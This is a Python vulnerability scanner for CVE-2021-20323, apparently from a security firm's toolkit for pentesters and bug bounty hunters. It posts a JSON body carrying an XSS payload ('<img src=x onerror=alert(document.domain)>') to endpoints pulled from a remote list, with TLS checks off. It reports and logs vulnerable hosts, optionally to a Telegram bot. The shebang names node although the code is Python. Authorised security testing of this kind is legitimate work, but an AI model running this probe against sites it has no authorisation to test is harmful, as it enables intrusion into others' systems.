#!/usr/bin/env node

"""
 * CVE-2021-20323
 * CVE-2021-20323 Bug scanner for WebPentesters and Bugbounty Hunters
 *
 * @Developed By Cappricio Securities <https://cappriciosec.com>
 */
 
"""
import requests
from urllib3.exceptions import InsecureRequestWarning
from urllib.parse import quote
from ..includes.writefile import writedata
from ..utils.const import Data
from ..utils.const import Colors
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from ..utils.configure import check_id
from ..utils.configure import new_chatid
from ..utils.configure import get_chatid
from ..includes.bot import sendmessage

header = {
    "Content-Type": "application/json",
}

xss = "{\"cappriciosec.com<img src=x onerror=alert(document.domain)>\":1}"


def cvescan(url, output):
    try:
        with requests.Session() as session:
            payreq = session.get(Data.payloadurl)
            for endpoint in payreq.text.splitlines():
                encode = quote(endpoint)
                fullurl = f'{url}{encode}'
                try:
                    response = session.post(
                        fullurl, data=xss, headers=header, verify=False, timeout=5)
                    print(f'testing ===> {fullurl}')
                    if response.status_code == 400:
                        if f'Unrecognized field "cappriciosec.com<img src=x onerror=alert(document.domain)>"' in response.text and 'text/html' in response.headers.get('Content-Type', ''):
                            outputprint = (
                                f"\n{Colors.RED}💸[Vulnerable]{Colors.RESET} ======> "
                                f"{Colors.BLUE}{url}{Colors.RESET} \n"
                                f"{Colors.MAGENTA}📸PoC-Url->{Colors.BLUE}${Colors.RESET} {fullurl}\n\n\n"
                            )
                            print(outputprint)
                            if check_id() == "Exist":
                                sendmessage(fullurl)
                            if output is not None:
                                writedata(
                                    output, str(f'{fullurl}\n'))
                            break
                except requests.exceptions.RequestException as e:
                    print(
                        f'{Colors.MAGENTA}Invalid Domain ->{Colors.BLUE}${Colors.RESET} {fullurl}: {e}')
    except requests.exceptions.RequestException as e:
        print(f"Check Network Connection: {e}")



